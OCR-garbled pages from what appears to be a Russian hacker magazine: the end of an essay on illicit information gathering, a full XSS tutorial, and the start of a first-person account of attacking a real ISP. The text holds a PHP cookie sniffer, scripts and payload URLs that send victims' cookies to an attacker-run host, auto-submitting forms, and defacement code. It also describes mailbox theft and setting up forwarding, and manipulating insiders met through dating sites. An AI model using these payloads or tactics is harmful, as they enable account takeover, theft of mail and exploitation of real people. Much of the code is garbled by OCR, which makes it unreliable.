работой. Лишняя возня им совсем ни к 
чему. Г ораздо проще ответить отказом, чем ^ 
ввязываться в бюрократическую волокиту. И 
ведь их можно понять — к любому замку можно 
подобрать ключ. 

Поговорим теперь о незаконных способах. 
Не для того, чтобы применять, а просто, чтобы 
знать о них (как говорится, тот, кто предуп- 
режден, вооружен). На первом месте, как во- 
дится, стоят удаленные атаки. Современные 
системы дырявы, администраторы необразо- 
ваны и/или ленивы, так почему бы хакерам и 
не процветать? Опять этот пресловутый чело- 
веческий фактор, позволяющий проникнуть в 
корпоративную сеть без изощренных методов. 
Простого письма с вложением, направленно- 
го в службу поддержки, обычно оказывается 
вполне достаточно, особенно если там сидят 
девочки, набранные по объявлению. Писать от 
имени Ьід-Ьозз'а совершенно не обязательно. 
Лучше притвориться ничего не понимающим 
лосем, желающим купить дорогостоящий про- 
дукт, если только ему объяснят, зачем он нужен. 
Ведь, образно говоря, ѴѴіпбоѵѵз 8егѵег в миску 
не положишь. И проблем она создает столько, 
что не помогает даже вазелин. Ой! О чем это я? 
Ах да! Прежде чем войти, подумай, как выйти 
(с) башкирская сказка. Стоит прислушаться к 
башковитым обитателям Южного Урала, тем 
более что похожая поговоркаесть и у арабов: не 
открывай дверь, которую ты не в силах закрыть. 
Короче! Перелезть через брандмауэр намного 
проще, чем вылезти потом обратно. Если вы 



не вступите он оставит нас в покое! 



в горшок с 
медом (он же 

разбудите Цербера 
(в смысле систему обнаружения вторжений), 
после чего останется только молиться на ргоху 
— чтобы не выдал истинный ІР-адрес, ведь 
многие «анонимные» ргоху его выдают. Кроме 
того, даже оставшись незамеченным, далеко 
не всегда можно сориентироваться в корпора- 
тивной сети и утащить что-то конкретное. Но, 
если Аплахзакрывает одну дверь, он открывает 
тысячу других, посылая нам проводника. А еще 
лучше — проводницу. Такую симпатичную, хо- 
рошую проводницу. Весь вопрос в том, где эту 
красавицу найти? Если публичные адреса на 
ѵѵеЬ-сайте не помогут, тогда начинаем рыскать 
на разных службах знакомств, делая веерные 
рассылки писем-на-которые-нельзя-не-отве- 
тить и определяя их принадлежность по ІР-ад- 
ресам в заголовках, поскольку большинство 
барышень пишет со служебного компьютера 
в служебное время. Это, кстати говоря, легко 
позволяет определить их географическую при- 
надлежность, особенно в свете того факта, что 
первым делом, по приходу на работу, проверя- 
ется почта, а затем уже все остальное (про ча- 
совые пояса не забываем: они _очень_ богатую 
информацию несут). 

Влюбленная девушка способна на многое. И 
нужно быть гадом, чтобы толкнуть ее на служеб- 
ное преступление. Но ведь тол кают же, шакалы 



Заключение 

Бывают непорочные невесты, но не бывает не- 
порочных свах (с) дружественные народы Ки- 
тая. Каждому из нас, программистов, приходит- 
ся грешить, действуя не всегда честным путем. 
Если для создания жизненно важной програм- 
мы нужна информация, которую не удается 
получить официальным путем, то остается ру- 
ководствоваться лишь жесткостью наказания, 
помноженную на вероятность быть пойманным, 
и моральным законом внутри себя. 

Обычная тактика, которой придерживаются 
практически все западные компании, напри- 
мер, таже СІ5СО и МісгозоЙ: если можно купить 
— покупаем (за разумную цену, естественно), 
если нет — форсируем рекуТибор. И пусть кто- 
нибудь попробуют доказать, что мы не были в 
Пизе. Кстати говоря, скандал, разгоревшийся 
вокруг кражи исходных кодов СІ5СО 05, не в 
последнюю очередь связан с тем, что в состав 
этой оси входит немало компонентов, «поза- 
имствованных» улинуха, которые (по лицензии) 
не могут использоваться в закрытых продуктах. 
Но, увы, суды очень редко удовлетворяют иски 
сообщества Ореп Зоигсе, а все потому, что 
оно, с точки зрения государственной машины, 
совсем не нужно, поскольку, в отличие от ком- 
паний-гигантов, не платит налогов. Но что поз- 
волено Юпитеру — не дозволено быку. Так что 
не будем высаживаться, а предоставим жизни 
идти своим чередом, пс 
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НА СТРАНИЦАХ НАШЕГО ЖУРНАЛА ТЫ ПОСТОЯННО ЧИТАЕШЬ О ТОМ, КАК ХАКЕР ЛОМАЕТ САЙТЫ С ПОМОЩЬЮ Х88-АТАК. 
С ЭТИХ ПОР ТАКОГО НЕ БУДЕТ. ЭТА СТАТЬЯ ПОДЫТОЖИТ ВСЕ ТВОИ ПРЕДСТАВЛЕНИЯ О ПОДОБНОГО ВИДА АТАКАХ. 



□Х88? Зачем матом ругаться? 

Хотя я и сказал, что статья подытоживает все, 
что было сказано об Х88, но давай вернемся на 
землю. Кто знает, вдругты решишь высосать уяз- 
вимость там, где ее нет? Всякое бывает. Вот тог- 
да надо будетуже подробно читать (или находить 
самому) о реализации ЭЗ, ѴВ8 (и внедрения их в 
НТМЬ) для каждого отдельного браузера. Одна- 
ко не расстраивайся заранее — огорчений не бу- 
дет. Итак, сказал сначала, значит, сначала. Сядь 
за парту, лекция началась. Первый вопрос: Х88 

— что это за зверь и с чем его едят? Зверюга эта 
расшифровывается какСгозз Зііе Зсгірііпд (меж- 
сайтовый скриптинг). Напрашивается вопрос 

— почему не СЗЗ? Об этом можно только гадать, 
но есть устоявшееся мнение о том, что, дескать, 
если бы называли СЗЗ, то люди бы путали его с 
Сазсабе Зіуіе ЗИееіз (каскадные таблицы сти- 
лей), что кХЗЗ имеет непосредственное отноше- 
ние. А заменить первую «С» решили буквой «X», 
поскольку Сгозз переводится с английского как 
«крест», а «X», согласись, очень дажеэтотсамый 
крести напоминает (если пофантазировать). 



Функционально межсайтовый скриптинг — это 
взаимодействие взломщика с пользователем 
средствами веб-приложения, которым пользует- 
ся жертва. То есть взломщик находит в системе 
возможность внедрения своего НТМЬного кода 
в страницу, отображаемую пользователю. А что 
можно с этим сделать? Читай дальше — и все пой- 
мешь сам. 

О Вкусное печенье и тяжелая сессия 

Итак, давай действовать и думать вместе. Пред- 
ставим, что мы получили каким-то образом доступ 
к редактированию НТМІ_-кода страницы, которую 
посетил пользователь. И не просто какой-то стра- 
ницы, вроде нашего хомячка, а страницы, прина- 
длежащей сайту, на котором у вышеупомянутого 
заведен аккаунт. Это значит, что в базе данных 
сайта хранится логин, пароль и еще кое-какая ин- 
формация о пользователе. И нам бы, конечно же, 
хотелось бы получить эту информацию. Давай 
поэтапно разберем авторизацию пользователя 
на сайте. Он заходит, вбивает в форму логин и 
пароль и проходит к себе в личный кабинет/фо- 



рум/чат и т.д. Фактически в момент авторизации 
происходит следующее: браузер юзера форми- 
рует запрос к серверу, в котором отсылает свой 
логин и пароль. Сервер принимает этот запрос, 
вынимает из него вышеуказанные данные и про- 
веряет, есть ли в базе данных такой паренек. На 
основе этого либо посылает его в Тибет к мона- 
хам, либо отвечает, что все хорошо. В ответе, так 
или иначе, содержится нечто, что будет в даль- 
нейшем отправлять пользователя на сервер, 
чтобы убедить последнего в том, что он — это 
именно он, а не какой-нибудь дядя Вася стретьего 
подъезда, и что авторизироваться ему дальше не 
обязательно, а достаточно посылать только это 
«что-то». Что же это за мистическое «что-то»? В 
современных веб-приложениях возможны толь- 
ко 2 варианта (левые скрипты от Васи Пупкина 
мы не рассматриваем): либо куки, либо номер 
сессии. Не пугайся сразу — сейчас все объясню. 
Давай не будем кричать, что все знают про куки. 
80% опрошенных, которые сказали, что знают, 
выдают ответ порядка: «Это вот такая типа вещь, 
где типа такие вот личные данные, гы». Мы же с 
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> Внедряем ХЗЗ в письмо 

тобой интеллигентные люди — должны уметь опе- 
рировать терминами. Куки (Соокіе — печеньки) 
— это параметры, передаваемые скрипту, равно- 
сильные параметрам, передаваемым в РОЗТ- или 
(ЗЕТ-запросе. То есть все, что нас идентифициру- 
ет, хранится у нас же самих. А это дает нам воз- 
можность не только ходить под своим логином по 
сайту, но и выйти с него и прийти на следующий 
день таким же макаром. Второй вариант — номер 
сессии. Сессия — это очень хитрая штука. Вся 
информация из нее хранится на сервере в пап- 
ке временных файлов. Сессии характеризуются 
двумя свойствами: сроком жизни и привязкой к 
ІР. При такой авторизации юзеру придется снова 
логиниться после повторного захода на сайт. Все 
просто — у сессии маленький срокжизни, и кэто- 
му времени на сервере уже не останется файла 
для нее. Чаще всего номер передается все в тех 
же куках, как отдельный параметр. Но ничего не 
мешает передать его через СЕТ, как, например, 
НДр://зі1е/?ЗЮ=ЗЕЗЗІОМ_ШМВЕР. 

А в чем, собственно, прелесть? А прелесть в 
том, что средствами ЗаѵаЗсгірІ или ѴВЗсгірІ мы 
можем получить куки пользователя для данного 
домена, на сайте которого находится документ. 
В ЗаѵаЗсгірі куки хранятся в переменной боси- 
тепі. соокіе. Все что нам надо, так это сформи- 
ровать запрос пользователя к нашему сниферу, 
в котором бы мы отправили свои куки. Снифер в 
терминологии ХЗЗ — это скрипт, который ловит 
все добро, которое передается ему в (ЗЕТ -запро- 
се. Вотпростейший примерсниферанаРНР, его 
ты уже знаешь наизусть, но мы отважимся при- 
вести его еще раз, так сказать, для отчетности: 

■ 

іГ(5ІгІеп($аиЕРУ_ЗТРІМО)<2)ехіІ; 

ИеасІег("Сопіепі-Туре:ітаде/рпд"); 

■ =ІтадеСгеаіе(1, 1); 

ІтадеРІ\І(3($іт); 

ітадесІезігоу($іт); 

ЗфЩорепС'зпіА.ІхГ, "а"); 
фиіз($ф,$аиЕРУ_ЗТРІМО. , \п\п и ); 

■ 

Предполагается, что на странице есть картинка. 
Если нет - нужно будет пойти альтернативным пу- 
тем и наколбасить следующий сценарий: 

<5сгірі Іапдиаде^аѵаЗсгірЬ 



сІоситепІітадез[0].згс="Іпйр://зпі1і : /зпі^?"+сІоситепі. 

соокіе 

</зсгірі> 

Теперь перейдем к плохим делам. 

□ Х88 бывают разные 

ХЗЗ можно разделить на подклассы. Я бы выделил 
следующую структуру: 

О Активные 

Активные ХХЗ'ски — самые опасные из возмож- 
ных ХЗЗ. Например, решил Василий Пупкин 
проверить свою почту на мэйл.ру через веб-ин- 
терфейс, и, вроде бы, все хорошо у него прошло. 
Увидел он письмо от своей любимой девушки, а в 
это время наш снифер принимает пароль него- 
дующего Василия. И тогда, облачившись во все 
черное, под покровом ночи, ты начинаешь писать 
всякие непристойные вещи... впрочем, не будем 
об этом. Короче говоря, активные ХЗЗ — это ХЗЗ 
там, где ты их меньше всего ожидаешь, точнее в 
твоем пользовательском интерфейсе. Там, куда 
ты заходил каждый раз, ничего не опасаясь, что- 
бы почитать посты на форуме или почту на сво- 
ем е-таіі, а тут... какая подлость — чужой код. И 
ничего с ним не поделаешь. Нет, конечно, можно 
отключить выполнение скриптов на странице в 
своем браузере, но кто, кроме нас, с тобой так 
делает? Явно не Шурик Пушкин :). 

О Пассивные 

Пассивные ХЗЗ — это уязвимости в динами- 
ческой части сайта. Это уже проще матрицы и 
ненадежнее. Не надо быть избранным, чтобы 
повестись на нее. ХЗЗ получается только при 
данном конкретном запросе к скрипту. Единс- 
твенное — необходимо, чтобы скрипт выводил 
тебе что-то, что ты задаешь в своем запросе. 
Пожалуй, это самые неудобные уязвимости для 
осуществления атаки. Пассивные ХЗЗ — уязви- 
мость в скриптах, параметры к которым переда- 
ются через (ЗЕТ и через РОЗТ. Через РОЗТ — это 
вообще самое большое извращение, которое 
только можно представить. Для того чтобы поль- 
зователь попался в ловушку с ОЕТ-пассивной 
ХЗЗ, ему достаточно дать ссылку на страницу, 
которая сгенерирует 63-код. А вот для того, что- 
бы пользователь угодил на РОЗТ-пассивную 
ХЗЗ, мы должны будем создать отдельный сайт, 
на котором поместим форму динамической от- 



правки с необходимыми нам полями. Давай раз- 
берем пример. Я расскажу о ОЕТ-пассивной ХЗЗ 
на ИДр://зоІ1.таіІ.ги/ . 

Вводим в поиск «аааа», жмем Епіег. Смотрим. На 
странице образовалось несколько тэгов <іпри!>, 
в которые вошел наш запрос, подставленный в 
параметр ѵаіие этого тэга и взятый в двойные ка- 
вычки. Попробуем выйти. Для этого введем в поиск 
вот такой запрос: 

" 5іуІе=ЬаскдгоипсІ:игІ(іаѵа5Сгірі:аІегі(сІоситепі.соокіе)) " 

Если ты решил проделывать опыты через осла, 
то выскочит куча абракадабры. Довести эту 
уязвимость до мультибраузерности и сделать 
отправку кук на снифер — дело техники, при- 
чем здесь сложностей не возникнет, поскольку 
фильтров вообще не наблюдается. Итак, чтобы 
пользователь попал на уязвимую страницу, нам 
просто надо сунуть ему вот такую ссылку: 
НВр://зоЙ.таіІ.ги/зеагсІі гезиіі ІпеасІег.рІір?д5=1&ѵѵ 
огбз=%22+зЫе%ЗРЬаскагоипсі%ЗАигІ%28іаѵазсг 
ір1%ЗАаІег!%28боситеп1.соокіе%29%29+%22 
А теперь представь, что бы было, если параметр 
«ѵѵогсіз» передавался скрипту через РОЗТ? Чтобы 
сформировать РОЗТ-запрос, надо сделать стра- 
ницу с формой , в поля которой будетзанесен необ- 
ходимый нам запрос, азатем сделать ЗаѵаЗсгірі'ом 
автоотправку формы. И уже наэту страницу давать 
ссылку своей жертве. Вот простой пример: 

<ИітІ> 

<ЬосІуопІоасІ="5.зиЬтіі();"> 

<Ьгт пате=засІіоп=Ийр://зо11таіІ.ги теіЬосНРОЗЪ» 
<іприиуре=ЬісІсІеп пате=ѵѵогсІз ѵаІие='" з!уІе=ЬаскдгоипсІ: 
игІОаѵазсгірТаІег^сІоситепІсоокіе))"^ 

<Аогт> 

</ЬосІу> 

</НтІ> 

Чтобы пользователь ничего не заподозрил, мы 
можем делать подобный редирект и с ОЕТ-пас- 
сивными уязвимостями. Более того! Можно делать 
это на уровне НТТР, например, с помощью такого 
РНР-скрита: 



ИеасІег("ІосаІіоп: Ийр://зоА.таіІ.ги/зеагсЩгезиІі_кіеасІег. 

р1пр?дз=1&\л/огс1з=%22+з1у1е%ЗОЬаскдгоипс1%ЗАиг1%28]а 
ѵазсгір!%ЗАаІег1:%28сІоситепі.соокіе%29%29+%22") 
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Такие ХЗЗ очень распространены в поисковых 
системах. 

О Полуактивные 

Данные уязвимости — нечто среднее между 
пассивными и активными. Фишка вот в чем. 
Мы заносим в базу данных такие значения, что 
при подстановке в страницу мы получим уязви- 
мость, при этом адрес будет выглядеть не так, 
как с ОЕТ-пассивными ХЗЗ, а как нормальный. С 
другой стороны, это не активная ХЗЗ, поскольку 
она предполагает внедрение в страницу, кото- 
рую пользователь посещает редко, а возможно, 
и не посещает вообще. Так или иначе, но нам 
придется давать ему ссылку на страницу с уязви- 
мостью, однако здесь извращения с редиректом 
уже не нужны. Частным случаем полуактивных 
ХЗЗ является ХЗЗ через 301-инъекцию. Давай 
посмотрим на примере. Допустим, что мы стобой 
два злых хакера, которым не хватает денег на по- 
купку банки пива. Итак, мы нашли ЗСЫпіесйоп 
в интернет-магазине и сбрутили имя таблицы с 
товарами. Теперь мы можем добавить/отредак- 
тировать информацию в этой таблице. Скажем, 
заменить имя товара в каталоге на ^ѵаЗсгірі. 
Но адрес страницы с товаром получится, на- 
пример, ИДр://зіІе/саІаІоа.рІпр?ісІ=12753 . Веро- 
ятность того, что пользователь сам забредет на 
эту страницу, ничтожно мала. Поэтому надо не- 
много извращаться: допустим, послать письмо 
особо богатому пользователю магазина — мол, 
на странице есть форма для получения скидки... 
Я думаю, ничего сложного тут нет. Любишь экзо- 
тику и извращения? Тогда читай дальше. Слабо- 
нервных прошу закрыть журнал. 

С Экзотика и извращения 

Аксиома: ХЗЗ есть везде — даже там, где ее нет. 
Действительно, это так. Для того чтобы найти 
ХЗЗ, надо лишь немного поработать головой — и 
найдешь ее в самом неожиданном месте. Если ты 
мне не веришь — почитай, например, на античате 
статью про использование ІІТР-7 в атаках класса 
ХЗЗ: Шр://апІісИаииМ/иІі7/ (Автор АІдоІѴ Можешь 
себе представить такую ситуацию: админ читает 
логи сайта, чтобы посмотреть, не проходили ли 



по нему хацкеры вроде тебя, и туту него улетают 
куки к нам на снифер. Конечно, ведь он не поду- 
мал, что перед тем, как выводить логи себе на 
экран, надо бы отфильтровать запросы пользо- 
вателей. Разве он мог предположить, что в этих 
самых запросах они могли послать что угодно, 
в том числе и яваскрипт, который в среде НТМІ_ 
документа (куда выводятся логи) успешно живет 
и работает, прям как Ленин в шалаше. 

Или, например, ты никогда не встречал ссылки 
вроде Шр://зі1е1/Ііпк.рІір?и=ИДр://зі1е2 ? Скорее 
всего, это обычный редиректор. Такие обычно 
делаются, например, для статистики: сколько кли- 
ков был о одел ано с зііе 1 на сайтзі!е2 . Однако даже 
такая схема может оказаться уязвимой. Фишка в 
том, что в РНР НТТР-заголовок формируется с 
помощью функции Иеабег(). Для того чтобы бра- 
узер перекинул пользователя на другую страни- 
цу, заголовок ответа сервера должен содержать 
строку: 

Цосаііоп: <АЛЛРЕ35> 

Где <АООРЕЗЗ> — адрес редиректа. Очевидно, 
что в нашем примере в коде скрипта есть вот такая 
строчка: 

".$_ОЕТ[ , и’]); 

Ну или что-то вроде этого. А что будет, если в ка- 
честве этой самой $_ОЕТ['и'] послать 2 символа 
перевода строки? Ьйр://зі1е1/Ііпк.рЬр?и=%0А%0А 
— никакого редиректа не произойдет. Снифером 
(не тем, что ловит куки, а тем, что ловит ІР-пакеты) 
можно посмотреть, что функция схавала наш за- 
прос. Это значит, что все, написанное нами после 
двух переводов строки %0А, будеттелом докумен- 
та, а значит, мы можем писать там все что угодно. 
Например: Ьйр://зі!е1/1іпк.рЬр?и=%0А%0А%ЗСзсгі 
р1%ЗЕаІеі1(боситеп1.соокіе)%ЗС/зсгір1%ЗЕ 
Выведет нам наши куки. Выходит, что это почти 
такая же обычная пассивная ХЗЗ. Ну, примеров 
еще можно приводить массу. ХЗЗ — это вообще 
тема, которую невозможно полностью исчерпать, 
так как постоянно придумывается что-то новое. 
Основную теорию мы прошли. Теперь рассмот- 



рим примеры этих самых ХЗЗ, а также сферы их 
применения. 

О Сферы применения 

Итак, в один прекрасный день ты зашел в логи 
своего снифера и обнаружил среди всей этой 
лабуды куку админа форума. Что же делать 
дальше? А варианта два. Вариант первый: в ку- 
ках лежит только номер сессии. Это означает, 
что, скорее всего, сделать ничего не удастся. 
Слишком невелик шанс, что сессия не была при- 
вязана к ІР и что к этому времени файл сессии 
еще сохранился на сервере. Вариант второй: в 
куках приплыла исчерпывающая авторизацион- 
ная информация, которая может быть исполь- 
зована когда угодно. Что с этим добром делать? 
Сейчас в подавляющем большинстве случаев 
ключ, на котором завязана вся авторизация, 
представляет собой тб5-слепок от пароля 

— 32-байтная последовательность шестнадца- 
теричных цифр вроде 4сас446с545799а99915 
ее0647аІ9623. Однако до сих пор встречаются 
системы, где этот самый ключ — пароль в чис- 
том виде (возмутительно это и потому, что в БД 
пароль лежит тоже в чистом виде). Что удивляет, 
одной из таких систем является форум журнала 

— іогит.хакер.ш :). Ну ладно, мы рассматрива- 
ем стандартный случай: в куках — хэш. Самое 
простое — подменить куки. Сделать это можно 
с помощью встроенной в браузер функции (как 
например в Орега) или с помощью специальной 
программы (ІЕСоокіезѴіеѵѵ для Іпіегпеі Ехріогег), 
можно все и руками сделать, но мы отклонились 
от темы. Итак, после подмены куков мы закры- 
ваем браузер (чтобы убить номер сессии на 
стороне клиента, который браузер передает в 
куках, ничего нам об этом не сообщая) и заходим 
в браузер снова. Идем на сайт и видим, что мы 
авторизированны в аккаунте жертвы. Что можно 
еще желать? Оказывается, не все так просто... В 
большинстве современных веб-приложений для 
выполнения жизненно важных для пользовате- 
ля или (если жертва — админ) сайта операций 
с акаунтом скрипт запрашивает у нас пароль. 
Но мы его не знаем, либо знаем, но молчим. В 
таких случаях нам могут помочь другие уязви- 
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> Запрос с подделанным реферером 

мости сервиса (например, в организации проверки пароля) 
или брутофорс хэша. Однако это делать последнее время 
проблематично — сейчас модно делать этот ключ каким-то 
кривым способом. Например, так: кеу=тсІ5(тсІ5(сопсаІ(разз 
,'б\д/(тО'))). Тем не менее, попытка не пытка. Если ты знаешь, 
что ключ считается подобным образом и владеешь самим 
алгоритмом (в случае, например, с бесплатной СМ3 или фо- 
румным движком), то можно написать брутфорс самому. Для 
других случаев вам поможет МЭбІпзісІе (говорят, в последней 
версии реализована система задания алгоритма, так что са- 
мому писать ничего не придется). Также сейчас стали в ходу 
онлайн-сервисы поиска хэша. 

0 Изврат продолжается 

Это было классическое применение ХЗЗ. Рассмотрим что-то 
более изощренное. 

Без всяких уязвимостей на портале мы всегда можем сделать 
одну интересную вещь. Аименно: поменять все настройки поль- 
зователя, которые не требуют пароля. Иногда — это подпись 
на форуме, ася, статус, емэйл (реже), а иногда даже пароль. 
Делается это очень просто. В любом веб-приложении есть кон- 
трольная панель юзера с формочкой, запрос в которую меня- 
ет необходимые настройки. В зависимости оттого, понимает 
скриптОЕТ-запрос илитолько РОЗТ, мы можем сделать ссылку 
на свой скрипт редактирования профайла или соответствую- 
щую страницу с формой метода пост (как было показано на 
РОЗТ-пассивныхХЗЗ), где укажем соответствующие парамет- 
ры. Единственная проблема — проверка поля Веіегег (адрес, 
с которого пришли) НТТР-запроса. Однако давай это оставим 
за гранью. Таким макаром, например, можно спокойно иметь 
панель администратора форума ехВВ. Примерно таким же 
способом осуществляется угон всей почты и установка пере- 
адресации на всю входящую на популярнейших российских и 
буржуйских почтовиках (да-да, это те, о которых вы подумали). 
Вкратце технологию можно описать так: 

1 / Пользователь открывает страницу с Х53. 

2/ХЗЗ подгружает в браузер пользователя (например, с помо- 
щью тэга <ітд>) наш скрипт, передавая ему куки и ПЕРЕПЕВ 
(реферера браузер передаст сам). 

3/ Из реферера скрипт получает номер сессии. На основе 
этого номера сессии он формирует заголовок переад- 
ресации на страницу настроек почтовика (браузер сам 
перекидывает юзера на эту пагу, получив от нашего скрип- 
та заголовок Босаііоп), указывая в параметре «привязать 
сессию к ІР» РАІ_ЗЕ. 

4/После этого у нашего скрипта развязаны руки, он открыва- 



ет соединения с сервером и формирует последовательность 
НТТР-запросов, с помощью которых сливает всю почту, ле- 
жащую на ящике жертвы, и устанавливает переадресацию 
с сохранением локальной копии на все входящие. Этот сце- 
нарий сейчас прокатывает практически везде. Такой скрипт 
обеспечивает результативную работу с жертвой, даже если 
авторизация на сервере проходит только по сессии. В терми- 
нологии ХЗЗ он называется функциональным снифером, про 
который в журнале писали тоже не раз. Еще одна область 
применения ХЗЗ, как ни странно, — дефейс. Вообще, это 
используется очень редко. Я не замечал, чтобы это кто-то 
использовал, поэтому мы рассмотрим примеры из того, что 
происходило с моим участием. Итак, а что же может сделать 
^ѵаЗсгірІ. Оказывается, он в состоянии переписать тело 
документа! А это — то, что нам надо. Хотя ты наверняка чи- 
тал про дефейс хакер. ру. Ну вот, это было сделано как раз 
с помощью замещения новости на главной странице (через 
ЗОБ-инъекцию) примерно воттаким кодом: 

<ітд д=а 5гс="" 5гс="" 5ІуІе="ЬаскдгоипсІ:игІ( І іаѵазсгір1::сІоситепІѵѵгі1:е(&ди 
оі;^е^асесI&^ио^;) , )" ѵѵісШп=-1 ІпеідН=-1 опЕггог="і^Гііз.за!='ІоГ){сІоситепІ 
■ 0еІасеЦ');1:Ы8.за='ІоГ;}"> 

Можно организовать временный дефейс сайтов, которые 
выводят последние запросы в их поисковике или с поискови- 
ков (уа.ш, гатЫег, доодіе и т.д.) к ним. Я думаю, все понятно, 
в чем тут фишка. Если надо, чтобы дефейс не спадал, обычно 
делают бота, который регулярно отправляет соответствующий 
запрос с подделанным реферером. Минус такого дефейса со- 
стоит в том, что он не будет действовать у тех, у кого отключен 
^ѵаЗсгірБ или, если ты напишешь криво сам дефейс-код, он 
может сработать далеко не в каждом браузере. 

О Итоги 

Ну и напоследок. Если ты хочешь впарить кому-нибудь 
трояна, запустить на компе жертвы биндшелл или просто 
сделать какую-нибудь нехорошую вещь, то тебе, возможно, 
помогут эксплоиты против браузера жертвы. Наверняка он 
не каждый день обновляет «смотрелку» . Вообще, ХЗЗ здесь 
несколько притянут за уши, но все же, если дать ему ссыл- 
ку на гатЫег.ш . где через ХЗЗ на страницу будет внедрен 
эксплоит, пользователь нажмет туда с большим доверием, 
чем на ссылку неизвестного сайта. Итак, ХЗЗ сегодня — это 
класс уязвимостей, которые достаточно несложно реали- 
зовать, еще проще их использовать, а встретить можно пов- 
семестно. ш 




> ѵѵѵѵѵѵ.ѵѵеЬ-Ііаск. 
гц/сіоѵѵпіоасі/сіоѵѵпіоасі. 
рИр?ао=78 — 
ІЕСоокіезѴіеѵѵ. 
ННр:// 2 Іоѵ.ога/ 
с!оѵѵпІоасІз/ппсІ5іпзісІѳ 
1 О.гаг — ІѴЮ5 Іпзісіе. 
ИПр://іѵсІЬ.ога/зеагсІі/ 
тсІ5/ — пример онлайн- 
поисковика хэшей. 




> Помни: действия каж- 
дого взломщика почти 
всегда противозакон- 
ны, так что советую 
ничего из вышеописан- 
ного не повторять. Все 
написано только для 
ознакомления. 
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Важный провайдер - 
свободный интернет 



КРУПНЫЕ хостинги и провайдеры всегда притягивали любопытный хакерский взгляд, и это не удивитель- 
но, ВЕДЬ ИМЕННО ТАМ ХРАНЯТСЯ БАЗЫ ДАННЫХ С САМОЙ РАЗНООБРАЗНОЙ ИНФОРМАЦИЕЙ: ОТ РЕГИСТРАЦИОННЫХ 
АНКЕТ ДО ПОЛЬЗОВАТЕЛЬСКИХ АККАУНТОВ. РОЛ ЯВЛЯЕТСЯ ОДНИМ ИЗ КРУПНЕЙШИХ ПРОВАЙДЕРОВ В РОССИИ И УЗБЕ- 
КИСТАНЕ, ПОЭТОМУ В ЭТОТ РАЗ ВЫБОР ПАЛ НА НЕГО.І 



□ Быстрый старт 

Одним из весенних вечеров, когда заняться 
было особенно нечем, мне на глаза попалась 
карточка Рола. Я не раз пользовался услугами 
данного провайдера, но сейчас меня заинте- 
ресовало совсем другое. А именно — защи- 
щенность его ресурсов. Недолго думая, я вбил 
в адресную строку ѵѵѵѵѵѵ.гоі.ги и нажал Епіег. 
Какіюказал первый осмотр, ресурс оказался 
огромным. Кроме новостных лент, он содер- 
жаліпочтовый сервис, личный кабинет, фото- 
альбом и регистрационные формы. Но меня 
мало прельщало занятие в виде проверки всех 
поддоменов, поэтому я решил поверхностно 
осмотреть скрипты, полагаясь исключитель- 
но на кривые руки разработчиков и удачу. Ка- 
ково же было мое удивление, когда через 15 
минут я нашел раскрытие путей установочных 
каталогов и хзз. Уязвимость присутствовала в 
скрипте зесопб.рИр, находящемся по адресу: 
бирѴ/ѵѵѵѵѵѵ.гоІ.ги/зесопб.рІір . Параметр Іоріс не 
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фильтровал вводящие данные, в результате 
чего скрип|любезно выполнял мой іаѵазсгірі- 
код в браузере. Достаточно было лишь указать 
запрос вида бДр://\л/\л/\л/.гоІ.ги/зесопсІ.рІір?1ор 
іс= 1 0<зспрша1ег1(‘ХЗЗ’)</зспр1> — и можно 
было наблюдать приветливое окошечко с над- 
писью «ХЗЗ» . Сначала я обрадовался в надеж- 
де на возможность получения чужихікуков. Но, 
осмотревшись внимательнее, понял, что не 
все так просто. Выяснилось, что скрипт филь- 
I тровал символ «+». Эту проблему я реЬил до- 
I статочно быітро, написав файл зсгірЦз и при- 
Ілинковав его к основному запросу. Получился 
Іследующий линк: ИДр://ѵѵѵѵѵѵ.гоІ.ги/зесопб. 

рйр?1оріс=10<5сгір! 5гс=”ИДр://зіорФе1гаисІ. 
ога/зсгірЦзх/зспрЬ . В зсгірЦз я записал 
■сам сценарий: ореп(‘ИДр://з!орІІіаІгаиб.огд/ 
1пГрИр?’+сІоситепГсоокіе); после чего залил 
файл на сервер ( зіорфеігаисі.огд ). Тестиро- 
вание завершилось удачно, уязвимость ус- 
пешно экспфатировалась. Но меня смущала 



одна немаловажная деталь — отсутствие в 
куках главного домена какой-либо полезной 
информации. Я хотел было уже приняться за 
исследование поддоменов, но к этому време- 
ни появился заказ — и мне пришлось сесть за 
работу, оставив в покое Рол. 

□ Все с начала 

Наступило лето, а вместе с ним и желание круп- 
ного взлома. И тут я вспомнил про Рол. Но, за- 
пустив браузер и зайдя по ссылке, я увидел, что 
админ пропатчил скрипт, и уязвимости больше 
нет. Меня это несколько огорчило, и я решил 
восполнить свою утрату любым путем. Для на- 
чала был произведен осмотр имеющихся под- 
доменов в количестве 4-х штук: ИДр://таіІ.гоІ.ги/ 
(почтовый сервис), ИДр://ѵоііісе.гоІ.ги/ (личный 
кабинет). ИДр://рИоіо.гоІ.ги/ (фотоальбом). ИДр:// 
зегѵісез.гоі.ш/гиз/ (цены и тарифы). В личном 
кабинете я не нашел ничего интересного. Все 
запросы грамотно фильтровались — и меня по- 
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ВАЖНЫЙ ПРОВАЙДЕР — СВОБОДНЫЙ ИНТЕРНЕТ 



сылали куда подальше :). Аналогичная ситуаций обстояла с 
зегѵісѳз.гоі.ги . На очереди находился почтовыйісервис, ко- 
торьій я собирался подвергнуть детальной проверке... 

О Вот они — баги 

При заходе на таіі.гоі.ги я увидел сообщение: «Сервис 
работает в тестовом режиме. Приносим извинения за воз- 
можные неполадки». Неполадки? А вот это уже интересно. 
Первым делом я проверил систему авторизации. Но она 
была написана должным образом — и меня снова ждал об- 
лом. Тогда я залогинился и вошел в веб-интерфейс почто- 
вого сервиса. Вспомнив, что перед активными действиями 

Ш л 1 I 

хорошо бы узнать, к чему эти действия могут привести, я 
заглянул к себе в куки и обомлел... там лежали моіііпогин 
и пароль в открытом виде! Причем именно эти данные ис- 
пользовались для выхода в сеть. Разработчики системы не 
удосужились даже элементарно зашифровать пароль (на- 
пример, тсІ5-алгоритмом). Это обрадовало меня по двум 
причинам. Во-первых, для доступа в сеть и для доігупа к 
мылу используются один и тот же логин/пасс. А во-вторых, 
если суметь каким-то образом похитить куки мыла, можно 
считать, что ты получаешь полное управление аккаунтом 
с доступом в личный кабинет. Собравшись с мыс|ями, я 
принял единственно верное решение: во что бы то ни стало 
найти уязвимость в почтовом сервисе. Но, как оказалось, 
сделать это было не так просто. Скрипты фильтровали 
все входящие данные, и изменение значений параметров 
ничего полезного не принесло. Я уже собирался уходить, 
когда заметил адресную книгу. Ничего особенного в ней не 
было, разве что не совсем обычная форма добавления кон- 
тактов... точнее форма добавления необычных контактов:). 
